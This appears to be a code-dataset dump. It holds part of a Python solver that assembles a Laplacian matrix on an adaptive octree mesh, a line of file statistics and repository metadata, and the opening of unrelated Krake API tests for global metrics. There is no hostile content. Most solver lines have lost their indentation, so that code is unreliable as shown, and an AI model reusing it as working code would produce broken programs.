matrix_add(tree_x, matrix, row, dy*dz/(dx*(dx*dy*dz)), level, i_right, j_right, k_right)
else:
for o in range(2):
for n in range(2):
matrix_add(tree_x, matrix, row, -(dy/2)*(dz/2)/((dx/2)*(dx*dy*dz)), level+1, 2*i+1, 2*j+n, 2*k+o)
matrix_add(tree_x, matrix, row, (dy/2)*(dz/2)/((dx/2)*(dx*dy*dz)), level+1, 2*i_right, 2*j+n, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# left flux for axis 1
if mesh.bc_compatible_local_indexes(tree_x, level, i, j-1, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_x, level, i, j-1, k)
index_left = mesh.z_curve_index(tree_x.dimension, level, i_left, j_left, k_left)
if index_left in tree_x.tree_nodes and tree_x.nisleaf[index_left] \
or index_left not in tree_x.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_x, matrix, row, -(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k)
matrix_add(tree_x, matrix, row, (dx*dz)/(dy*(dx*dy*dz)), level, i_left, j_left, k_left)
else:
for o in range(2):
for m in range(2):
matrix_add(tree_x, matrix, row, -(dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j, 2*k+o)
matrix_add(tree_x, matrix, row, (dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j_left+1, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 1
if mesh.bc_compatible_local_indexes(tree_x, level, i, j+1, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_x, level, i, j+1, k)
index_right = mesh.z_curve_index(tree_x.dimension, level, i_right, j_right, k_right)
if index_right in tree_x.tree_nodes and tree_x.nisleaf[index_right] \
or index_right not in tree_x.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_x, matrix, row, -dx*dz/(dy*(dx*dy*dz)), level, i, j, k)
matrix_add(tree_x, matrix, row, dx*dz/(dy*(dx*dy*dz)), level, i_right, j_right, k_right)
else:
                    for o in range(2):
                        for m in range(2):
                            matrix_add(tree_x, matrix, row, -(dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+1, 2*k+o)
                            matrix_add(tree_x, matrix, row, (dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j_right, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# left flux for axis 2
if mesh.bc_compatible_local_indexes(tree_x, level, i, j, k-1) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_x, level, i, j, k-1)
index_left = mesh.z_curve_index(tree_x.dimension, level, i_left, j_left, k_left)
if index_left in tree_x.tree_nodes and tree_x.nisleaf[index_left] \
or index_left not in tree_x.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_x, matrix, row, -(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k)
matrix_add(tree_x, matrix, row, (dx*dy)/(dz*(dx*dy*dz)), level, i_left, j_left, k_left)
else:
for n in range(2):
for m in range(2):
matrix_add(tree_x, matrix, row, -(dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k)
matrix_add(tree_x, matrix, row, (dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k_left+1)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 2
if mesh.bc_compatible_local_indexes(tree_x, level, i, j, k+1) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_x, level, i, j, k+1)
index_right = mesh.z_curve_index(tree_x.dimension, level, i_right, j_right, k_right)
if index_right in tree_x.tree_nodes and tree_x.nisleaf[index_right] \
or index_right not in tree_x.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_x, matrix, row, -(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k)
matrix_add(tree_x, matrix, row, (dx*dy)/(dz*(dx*dy*dz)), level, i_right, j_right, k_right)
else:
for n in range(2):
for m in range(2):
matrix_add(tree_x, matrix, row, -(dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k+1)
matrix_add(tree_x, matrix, row, (dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k_right)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# y-component
for row in range(number_of_rows):
index = tree_y.tree_leaves[row]
i = tree_y.nindex_x[index]
j = tree_y.nindex_y[index]
k = tree_y.nindex_z[index]
level = tree_y.nlevel[index]
dx = tree_y.ndx[index]
dy = tree_y.ndy[index]
dz = tree_y.ndz[index]
row_y = row + number_of_rows
# left flux for axis 0
if mesh.bc_compatible_local_indexes(tree_y, level, i-1, j, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_y, level, i-1, j, k)
index_left = mesh.z_curve_index(tree_y.dimension, level, i_left, j_left, k_left)
if index_left in tree_y.tree_nodes and tree_y.nisleaf[index_left] \
or index_left not in tree_y.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_y, matrix, row_y, -(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dy*dz)/(dx*(dx*dy*dz)), level, i_left, j_left, k_left, number_of_rows)
else:
for o in range(2):
for n in range(2):
matrix_add(tree_y, matrix, row_y, -((dy/2)*(dz/2))/((dx/2)*(dx*dy*dz)), level+1, 2*i, 2*j+n, 2*k+o, number_of_rows)
matrix_add(tree_y, matrix, row_y, ((dy/2)*(dz/2))/((dx/2)*(dx*dy*dz)), level+1, 2*i_left+1, 2*j+n, 2*k+o, number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k, number_of_rows)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 0
if mesh.bc_compatible_local_indexes(tree_y, level, i+1, j, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_y, level, i+1, j, k)
index_right = mesh.z_curve_index(tree_y.dimension, level, i_right, j_right, k_right)
if index_right in tree_y.tree_nodes and tree_y.nisleaf[index_right] \
or index_right not in tree_y.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_y, matrix, row_y, -dy*dz/(dx*(dx*dy*dz)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, dy*dz/(dx*(dx*dy*dz)), level, i_right, j_right, k_right, number_of_rows)
else:
for o in range(2):
for n in range(2):
matrix_add(tree_y, matrix, row_y, -(dy/2)*(dz/2)/((dx/2)*(dx*dy*dz)), level+1, 2*i+1, 2*j+n, 2*k+o, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dy/2)*(dz/2)/((dx/2)*(dx*dy*dz)), level+1, 2*i_right, 2*j+n, 2*k+o, number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k, number_of_rows)
elif boundary_conditions == "neumann":
# the right flux depends only on the boundary condition scalar
pass
# left flux for axis 1
if mesh.bc_compatible_local_indexes(tree_y, level, i, j-1, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_y, level, i, j-1, k)
index_left = mesh.z_curve_index(tree_y.dimension, level, i_left, j_left, k_left)
if index_left in tree_y.tree_nodes and tree_y.nisleaf[index_left] \
or index_left not in tree_y.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_y, matrix, row_y, -(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx*dz)/(dy*(dx*dy*dz)), level, i_left, j_left, k_left, number_of_rows)
else:
for o in range(2):
for m in range(2):
matrix_add(tree_y, matrix, row_y, -(dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j, 2*k+o, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j_left+1, 2*k+o, number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k, number_of_rows)
elif boundary_conditions == "neumann":
# the left flux depends only on the boundary condition scalar
pass
# right flux for axis 1
if mesh.bc_compatible_local_indexes(tree_y, level, i, j+1, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_y, level, i, j+1, k)
index_right = mesh.z_curve_index(tree_y.dimension, level, i_right, j_right, k_right)
if index_right in tree_y.tree_nodes and tree_y.nisleaf[index_right] \
or index_right not in tree_y.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_y, matrix, row_y, -dx*dz/(dy*(dx*dy*dz)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, dx*dz/(dy*(dx*dy*dz)), level, i_right, j_right, k_right, number_of_rows)
else:
for o in range(2):
for m in range(2):
matrix_add(tree_y, matrix, row_y, -(dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+1, 2*k+o, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j_right, 2*k+o, number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k, number_of_rows)
elif boundary_conditions == "neumann":
# the right flux depends only on the boundary condition scalar
pass
# left flux for axis 2
if mesh.bc_compatible_local_indexes(tree_y, level, i, j, k-1) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_y, level, i, j, k-1)
index_left = mesh.z_curve_index(tree_y.dimension, level, i_left, j_left, k_left)
if index_left in tree_y.tree_nodes and tree_y.nisleaf[index_left] \
or index_left not in tree_y.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_y, matrix, row_y, -(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx*dy)/(dz*(dx*dy*dz)), level, i_left, j_left, k_left, number_of_rows)
else:
for n in range(2):
for m in range(2):
matrix_add(tree_y, matrix, row_y, -(dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k_left+1, number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, number_of_rows)
elif boundary_conditions == "neumann":
# the left flux depends only on the boundary condition scalar
pass
# right flux for axis 2
if mesh.bc_compatible_local_indexes(tree_y, level, i, j, k+1) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_y, level, i, j, k+1)
index_right = mesh.z_curve_index(tree_y.dimension, level, i_right, j_right, k_right)
if index_right in tree_y.tree_nodes and tree_y.nisleaf[index_right] \
or index_right not in tree_y.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_y, matrix, row_y, -(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx*dy)/(dz*(dx*dy*dz)), level, i_right, j_right, k_right, number_of_rows)
else:
for n in range(2):
for m in range(2):
matrix_add(tree_y, matrix, row_y, -(dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k+1, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k_right, number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, number_of_rows)
elif boundary_conditions == "neumann":
# the right flux depends only on the boundary condition scalar
pass
# z-component
for row in range(number_of_rows):
index = tree_z.tree_leaves[row]
i = tree_z.nindex_x[index]
j = tree_z.nindex_y[index]
k = tree_z.nindex_z[index]
level = tree_z.nlevel[index]
dx = tree_z.ndx[index]
dy = tree_z.ndy[index]
dz = tree_z.ndz[index]
row_z = row + 2*number_of_rows
# left flux for axis 0
if mesh.bc_compatible_local_indexes(tree_z, level, i-1, j, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_z, level, i-1, j, k)
index_left = mesh.z_curve_index(tree_z.dimension, level, i_left, j_left, k_left)
if index_left in tree_z.tree_nodes and tree_z.nisleaf[index_left] \
or index_left not in tree_z.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_z, matrix, row_z, -(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dy*dz)/(dx*(dx*dy*dz)), level, i_left, j_left, k_left, 2*number_of_rows)
else:
for o in range(2):
for n in range(2):
matrix_add(tree_z, matrix, row_z, -((dy/2)*(dz/2))/((dx/2)*(dx*dy*dz)), level+1, 2*i, 2*j+n, 2*k+o, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, ((dy/2)*(dz/2))/((dx/2)*(dx*dy*dz)), level+1, 2*i_left+1, 2*j+n, 2*k+o, 2*number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_z, matrix, row_z, -2*(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
elif boundary_conditions == "neumann":
# the left flux depends only on the boundary condition scalar
pass
# right flux for axis 0
if mesh.bc_compatible_local_indexes(tree_z, level, i+1, j, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_z, level, i+1, j, k)
index_right = mesh.z_curve_index(tree_z.dimension, level, i_right, j_right, k_right)
if index_right in tree_z.tree_nodes and tree_z.nisleaf[index_right] \
or index_right not in tree_z.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_z, matrix, row_z, -dy*dz/(dx*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, dy*dz/(dx*(dx*dy*dz)), level, i_right, j_right, k_right, 2*number_of_rows)
else:
for o in range(2):
for n in range(2):
matrix_add(tree_z, matrix, row_z, -(dy/2)*(dz/2)/((dx/2)*(dx*dy*dz)), level+1, 2*i+1, 2*j+n, 2*k+o, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dy/2)*(dz/2)/((dx/2)*(dx*dy*dz)), level+1, 2*i_right, 2*j+n, 2*k+o, 2*number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_z, matrix, row_z, -2*(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
elif boundary_conditions == "neumann":
# the right flux depends only on the boundary condition scalar
pass
# left flux for axis 1
if mesh.bc_compatible_local_indexes(tree_z, level, i, j-1, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_z, level, i, j-1, k)
index_left = mesh.z_curve_index(tree_z.dimension, level, i_left, j_left, k_left)
if index_left in tree_z.tree_nodes and tree_z.nisleaf[index_left] \
or index_left not in tree_z.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_z, matrix, row_z, -(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dx*dz)/(dy*(dx*dy*dz)), level, i_left, j_left, k_left, 2*number_of_rows)
else:
for o in range(2):
for m in range(2):
matrix_add(tree_z, matrix, row_z, -(dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j, 2*k+o, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j_left+1, 2*k+o, 2*number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_z, matrix, row_z, -2*(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
elif boundary_conditions == "neumann":
# the left flux depends only on the boundary condition scalar
pass
# right flux for axis 1
if mesh.bc_compatible_local_indexes(tree_z, level, i, j+1, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_z, level, i, j+1, k)
index_right = mesh.z_curve_index(tree_z.dimension, level, i_right, j_right, k_right)
if index_right in tree_z.tree_nodes and tree_z.nisleaf[index_right] \
or index_right not in tree_z.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_z, matrix, row_z, -dx*dz/(dy*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, dx*dz/(dy*(dx*dy*dz)), level, i_right, j_right, k_right, 2*number_of_rows)
else:
for o in range(2):
for m in range(2):
matrix_add(tree_z, matrix, row_z, -(dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+1, 2*k+o, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j_right, 2*k+o, 2*number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_z, matrix, row_z, -2*(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
elif boundary_conditions == "neumann":
# the right flux depends only on the boundary condition scalar
pass
# left flux for axis 2
if mesh.bc_compatible_local_indexes(tree_z, level, i, j, k-1) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_z, level, i, j, k-1)
index_left = mesh.z_curve_index(tree_z.dimension, level, i_left, j_left, k_left)
if index_left in tree_z.tree_nodes and tree_z.nisleaf[index_left] \
or index_left not in tree_z.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_z, matrix, row_z, -(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dx*dy)/(dz*(dx*dy*dz)), level, i_left, j_left, k_left, 2*number_of_rows)
else:
for n in range(2):
for m in range(2):
matrix_add(tree_z, matrix, row_z, -(dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k_left+1, 2*number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_z, matrix, row_z, -2*(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
elif boundary_conditions == "neumann":
# the left flux depends only on the boundary condition scalar
pass
# right flux for axis 2
if mesh.bc_compatible_local_indexes(tree_z, level, i, j, k+1) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_z, level, i, j, k+1)
index_right = mesh.z_curve_index(tree_z.dimension, level, i_right, j_right, k_right)
if index_right in tree_z.tree_nodes and tree_z.nisleaf[index_right] \
or index_right not in tree_z.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_z, matrix, row_z, -(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dx*dy)/(dz*(dx*dy*dz)), level, i_right, j_right, k_right, 2*number_of_rows)
else:
for n in range(2):
for m in range(2):
matrix_add(tree_z, matrix, row_z, -(dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k+1, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k_right, 2*number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_z, matrix, row_z, -2*(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
elif boundary_conditions == "neumann":
# the right flux depends only on the boundary condition scalar
pass
matrix.assemble()
return matrix
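# Added sanity sketch (hedged; not part of the original solver, pure algebra
# on the coefficients used in create_matrix above): each face contributes
# face_area / (center_distance * cell_volume). For a same-level neighbor
# along z this is (dx*dy)/(dz*(dx*dy*dz)) = 1/dz**2, the standard
# second-order stencil weight; across a refined face each of the four child
# faces carries (dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)) = 1/(2*dz**2); and at a
# Dirichlet boundary the prescribed value sits half a cell away, doubling
# the diagonal weight to 2/dz**2 while the boundary value itself is handled
# on the right-hand side by create_bc_scalar.
def _check_flux_weights(dx=0.5, dy=0.5, dz=0.5):
    volume = dx * dy * dz
    uniform = (dx * dy) / (dz * volume)                  # same-level face
    child = ((dx / 2) * (dy / 2)) / ((dz / 2) * volume)  # one of four child faces
    dirichlet = 2 * (dx * dy) / (dz * volume)            # Dirichlet boundary face
    assert abs(uniform - 1 / dz ** 2) < 1e-12
    assert abs(child - 1 / (2 * dz ** 2)) < 1e-12
    assert abs(dirichlet - 2 / dz ** 2) < 1e-12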
if __name__ == "__main__":
output_module = importlib.import_module(cfg.output_module_name)
tree = mesh.create_new_tree(cfg.dimension, cfg.min_level, cfg.max_level, cfg.stencil_graduation, cfg.stencil_prediction)
tree.tag = "u"
mesh.listing_of_leaves(tree)
print(tree.number_of_leaves)
print("")
laplacian_matrix = create_matrix(tree, 0)
laplacian_matrix.view()
print("")
for index in tree.tree_leaves:
tree.nvalue[index] = cfg.function(tree.ncoord_x[index], tree.ncoord_y[index])
output_module.write(tree, "test_finest_grid.dat")
op.run_projection(tree)
op.encode_details(tree)
op.run_thresholding(tree)
op.run_grading(tree)
op.run_pruning(tree)
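# Added note (hedged reading of the op.* calls above): this is the usual
# multiresolution adaptation sequence: project leaf values onto coarser
# levels, encode the detail (wavelet) coefficients, threshold the small
# details, grade the tree so refinement levels change gradually, then prune
# the nodes that are no longer needed, yielding the adapted grid used below.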
mesh.listing_of_leaves(tree)
print(tree.number_of_leaves)
print("")
output_module.write(tree, "test_adapted_grid.dat")
laplacian_matrix = create_matrix(tree, 0)
laplacian_matrix.view()
print("")
laplacian_bc = create_bc_scalar(tree, 0)
laplacian_bc.view()
print("")
| 51.052751 | 151 | 0.558504 | 10,382 | 67,747 | 3.457041 | 0.019649 | 0.036109 | 0.065197 | 0.029422 | 0.94617 | 0.939205 | 0.934162 | 0.933437 | 0.930846 | 0.929314 | 0 | 0.017958 | 0.326007 | 67,747 | 1,326 | 152 | 51.091252 | 0.768073 | 0.149143 | 0 | 0.722222 | 0 | 0 | 0.011484 | 0.000371 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003704 | false | 0.044444 | 0.01358 | 0 | 0.028395 | 0.009877 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
18e8cc5aac3a05e9140749711e5363b182b11a82 | 18,092 | py | Python | krake/tests/client/test_core.py | rak-n-rok/Krake | 2f0d4a382b99639e2c1149ee8593a9bb589d2d3f | [
"Apache-2.0"
] | 1 | 2020-05-29T08:43:32.000Z | 2020-05-29T08:43:32.000Z | krake/tests/client/test_core.py | rak-n-rok/Krake | 2f0d4a382b99639e2c1149ee8593a9bb589d2d3f | [
"Apache-2.0"
] | null | null | null | krake/tests/client/test_core.py | rak-n-rok/Krake | 2f0d4a382b99639e2c1149ee8593a9bb589d2d3f | [
"Apache-2.0"
] | 1 | 2019-11-19T13:39:02.000Z | 2019-11-19T13:39:02.000Z | from operator import attrgetter
from krake.api.app import create_app
from krake.client import Client
from krake.client.core import CoreApi
from krake.data.core import (
GlobalMetric,
GlobalMetricsProvider,
RoleBinding,
Role,
WatchEventType,
)
from krake.test_utils import with_timeout, aenumerate
from tests.factories.core import (
GlobalMetricFactory,
GlobalMetricsProviderFactory,
MetricsProviderSpecFactory,
MetricSpecProviderFactory,
RoleBindingFactory,
RoleFactory,
RoleRuleFactory,
)
async def test_create_global_metric(aiohttp_server, config, db, loop):
data = GlobalMetricFactory()
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.create_global_metric(body=data)
assert received.api == "core"
assert received.kind == "GlobalMetric"
assert received.metadata.name == data.metadata.name
assert received.metadata.namespace is None
assert received.metadata.created
assert received.metadata.modified
stored = await db.get(GlobalMetric, name=data.metadata.name)
assert stored == received
async def test_delete_global_metric(aiohttp_server, config, db, loop):
data = GlobalMetricFactory(metadata__finalizers="keep-me")
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.delete_global_metric(name=data.metadata.name)
assert received.api == "core"
assert received.kind == "GlobalMetric"
assert received.spec == data.spec
assert received.metadata.deleted is not None
stored = await db.get(GlobalMetric, name=data.metadata.name)
assert stored == received
async def test_list_global_metrics(aiohttp_server, config, db, loop):
# Populate database
data = [
GlobalMetricFactory(),
GlobalMetricFactory(),
GlobalMetricFactory(),
GlobalMetricFactory(),
GlobalMetricFactory(),
GlobalMetricFactory(),
]
for elt in data:
await db.put(elt)
# Start API server
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.list_global_metrics()
assert received.api == "core"
assert received.kind == "GlobalMetricList"
key = attrgetter("metadata.name")
assert sorted(received.items, key=key) == sorted(data, key=key)
@with_timeout(3)
async def test_watch_global_metrics(aiohttp_server, config, db, loop):
data = [
GlobalMetricFactory(),
GlobalMetricFactory(),
GlobalMetricFactory(),
GlobalMetricFactory(),
]
async def modify():
for elt in data:
await db.put(elt)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
async with core_api.watch_global_metrics() as watcher:
modifying = loop.create_task(modify())
async for i, event in aenumerate(watcher):
expected = data[i]
assert event.type == WatchEventType.ADDED
assert event.object == expected
# subtract 1 for the zero-based index offset and 1 more for the
# resource in another namespace
if i == len(data) - 2:
break
await modifying
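# Added note (hedged reading of the pattern above): the watcher is opened
# before the modify() task is scheduled, so every db.put() should surface
# as an ADDED event; the loop breaks once the expected events have arrived,
# and the writer task is awaited so it is not left dangling. The other
# watch tests below follow the same shape.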
async def test_read_global_metric(aiohttp_server, config, db, loop):
data = GlobalMetricFactory()
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.read_global_metric(name=data.metadata.name)
assert received == data
async def test_update_global_metric(aiohttp_server, config, db, loop):
data = GlobalMetricFactory()
await db.put(data)
data.spec.provider = MetricSpecProviderFactory()
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.update_global_metric(
name=data.metadata.name, body=data
)
assert received.api == "core"
assert received.kind == "GlobalMetric"
assert received.spec == data.spec
assert data.metadata.modified < received.metadata.modified
stored = await db.get(GlobalMetric, name=data.metadata.name)
assert stored == received
async def test_create_global_metrics_provider(aiohttp_server, config, db, loop):
data = GlobalMetricsProviderFactory()
server = await aiohttp_server(create_app(config=config))
